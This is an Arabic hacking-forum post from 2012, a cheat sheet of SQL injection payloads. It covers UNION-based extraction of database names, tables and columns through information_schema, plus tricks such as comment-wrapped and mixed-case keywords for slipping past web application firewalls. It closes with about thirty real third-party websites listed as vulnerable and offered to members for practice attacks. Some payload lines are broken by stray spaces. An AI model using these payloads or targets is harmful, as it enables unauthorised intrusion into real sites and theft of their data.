منتدى أمن الإسلام | لا اله الا الله محمد رسول الله | IS-SEC.ORG | Dz-SeC Team | - عرض مشاركة واحدة - جميع أوامر SqL Injection أوامر تخطي Forbidden 403 أوامر تخطي Not Acceptable

sH3LL · 09/11/2012, 11:37

جميع أوامر SqL Injection أوامر تخطي Forbidden 403 أوامر تخطي Not Acceptable

جميع أوامر
SqL Injection
أوامر تخطي
Forbidden 403
أوامر تخطي
Not Acceptable
أوامر التـشفــيــر أثناء الحقن
أوامر تخطي عدم ظهور عدد الأعمدة
==============================
أوامر SqL Injection
==============================
أمر استخراج عدد الأعمدة
==============================
+order+by+
==============================
أمر استخراج العامود المصاب
==============================
+union+select+
==============================
أمر استخراج اسم قاعدة البيانات
==============================
Database()
==============================
أمر استخراج اصدار قاعدة البيانات
==============================
Version()
==============================
أمر استخراج يوزر قاعدة البيانات
User()
==============================
أمر استخراج الجداول
==============================
يوضع هذا الأمر مكان العامود المصاب
==============================
group_concat(table_name)
==============================
ويوضع هذا الأمر في نهاية الرابط
==============================
+from+information_schema.tables+where+table_schema =database()--
==============================
أمر استخراج الأعمدة
==============================
يوضع هذا الأمر مكان العامود المصاب
==============================
group_concat(column_name)
==============================
ويوضع هذا الأمر في نهاية الرابط
==============================
+from+information_schema.columns+where+table_schem a=database()--
==============================
أوامر تخطي Forbidden 403 اثناء استخراج العامود المصاب + استخراج الجداول ولأعمدة
==============================
تخطي Forbidden 403 اثناء استخراج العامود المصاب
==============================
اضافة الفلتر
==============================
/*! */
==============================
على كلمة
==============================
select
==============================
لتصبح بهذا الشكل
==============================
/*!select*/
==============================
واذا لم تنجح الطريقة العب بكلمة
==============================
select
==============================
لتصبح بهذا الشكل
==============================
/*!SeLeCt*/
==============================
احرف سمول وأحرف كابتل
==============================
تخطي Forbidden 403 اثناء استخراج الجداول
==============================
التعديل بالأمر
==============================
select
==============================
ليصبح بهذا الشكل
==============================
/*!SeLeCt*/
==============================
التعديل بالأمر
==============================
group_concat(table_name)
==============================
ليصبح بهذا الشكل
==============================
/*!GrOuP_CoNcAT(table_name)*/
==============================
وتعديل الامر
==============================
ليصبح بهذا الشكل
==============================
+from+information_schema.tables+where+table_schema =database()--
==============================
تخطي Forbidden 403 اثناء استخراج الجداول
==============================
التعديل بالأمر
==============================
select
==============================
ليصبح بهذا الشكل
==============================
/*!SeLeCt*/
==============================
التعديل بالأمر
==============================
group_concat(column_name)
==============================
ليصبح بهذا الشكل
==============================
/*!GrOuP_CoNcAT(column_name)*/
==============================
وتعديل الامر
==============================
ليصبح بهذا الشكل
==============================
+from+information_schema.columns+where+table_schem a=database()--
==============================
ليصبح بهذا الشكل
==============================
+
==============================
from+information_schema./*!columns*/+where+table_schema=database()--
==============================
أوامر تخطي Not Acceptable
==============================
تخطي Not Acceptable اثناء استخراج العامود المصاب
==============================
اضافة الفلتر
==============================
/*! */
==============================
على كلمة
==============================
select
==============================
لتصبح بهذا الشكل
==============================
/*!select*/
==============================
واذا لم تنجح الطريقة العب بكلمة
==============================
select
==============================
لتصبح بهذا الشكل
==============================
/*!SeLeCt*/
==============================
احرف سمول وأحرف كابتل
==============================
تخطي
Not Acceptable
اثناء استخراج الجداول
==============================
التعديل بالأمر
==============================
select
==============================
ليصبح بهذا الشكل
==============================
/*!SeLeCt*/
==============================
التعديل بالأمر
==============================
group_concat(table_name)
==============================
ليصبح بالشكل دا
==============================
/*!GrOuP_CoNcAT(table_name)*/
==============================
تخطي Not Acceptable اثناء استخراج الجداول
==============================
التعديل بالأمر
==============================
select
==============================
ليصبح بهذا الشكل
==============================
/*!SeLeCt*/
==============================
التعديل بالأمر
==============================
group_concat(column_name)
==============================
ليصبح بالشكل دا
==============================
/*!GrOuP_CoNcAT(column_name)*/
==============================
أوامر تخطي الحماية من بعض الأوامر
==============================
هذا الأمر نضعه مكان العامود المصاب
==============================
concat(unhex(hex(concat(table_name,0x3a,column_nam e,0x3a,table_schema))))
==============================
وهذا الأمر نضعه في نهاية الرابط
==============================
+from+information_schema.columns--
==============================
أوامر تخطي عدم ظهور عدد الأعمدة
==============================
نقوم باضافة
==============================
+--+
==============================
في نهاية الرابط
==============================
واضافة
العلامة التي بين قوسين
==============================
(')
==============================
بعد
==============================
.php?id=1
==============================
ليصبح بهذا الشكل
==============================
.php?id=1'
==============================
هذه تكون نهاية الموضوع ارجو ان اكون قد وفقت بوضع الأوامر

مجموعة من المواقع المصابة للاعضاء للتجربة

http://www.backscatter.com/learn/article/article.php?ID=57'
http://www.dahsha.com/old/viewarticle.php?id=28325'
http://www.dahsha.com/old/viewarticle.php?id=32187'
http://www.jpa.asso.fr/index2.php?goto=revue_SD'
http://www.jpa.asso.fr/index2.php?goto=decouverte'
http://www.musicmania.co.nz/item_list.php?cat_id=30'
http://www.musicmania.co.nz/item_list.php?cat_id=74'
http://www.livingstontimber.co.uk/stocklist.php?id=3'
http://www.mines-saint-etienne.org/gene/main.php?url_assoc=E&base=1021'
http://www.agiletecnologia.inf.br/fadurpe/itep/php/interna.php?CodPagina=1'
http://www.leavenworth.org/modules/pages/index.php?pageid=1'
http://www.windsor-restaurants.co.uk/detail.php?id=11'
http://www.planetradiocity.com/downloads/download_category.php?catid=3'
http://www.music.haihoi.com/main.php?name=Tamil&mode=1'
http://www.livingstontimber.co.uk/stocklist.php?id=6'
http://www.storystar.com/php/list.php?theme_id=3'
http://www.sunkenships.info/view.php?ItemID=4'
http://www.askuncleralph.com/searchcloud/print_listing.php?page=13'
http://www.thedecadesband.ca/pages.php?id=1'
http://www.planetbollywood.com/displayArticle.php?id=060306044135'
http://www.planetbollywood.com/displayArticle.php?id=061706060842'
http://www.samsamwater.com/library.php?cat=rwh'
http://www.wholesale-indian-silver-jewelry.com/cat_view.php?id=74'
http://steelselect.com/content/viewresource.php?id=4586'
http://www.apolloqueen.com/profile.php?id=125'
http://www.apolloqueen.com/profile.php?id=119'
http://www.biancos.com/products.php?c=56'
http://www.vpozore.ru/?category=jkh'
http://famousquotespoems.com/index.php?page=life_quotes'
http://emtek.com/product-detail.php?id=476'
http://www.skybrary.aero/bookshelf/content/bookDetails.php?bookId=233'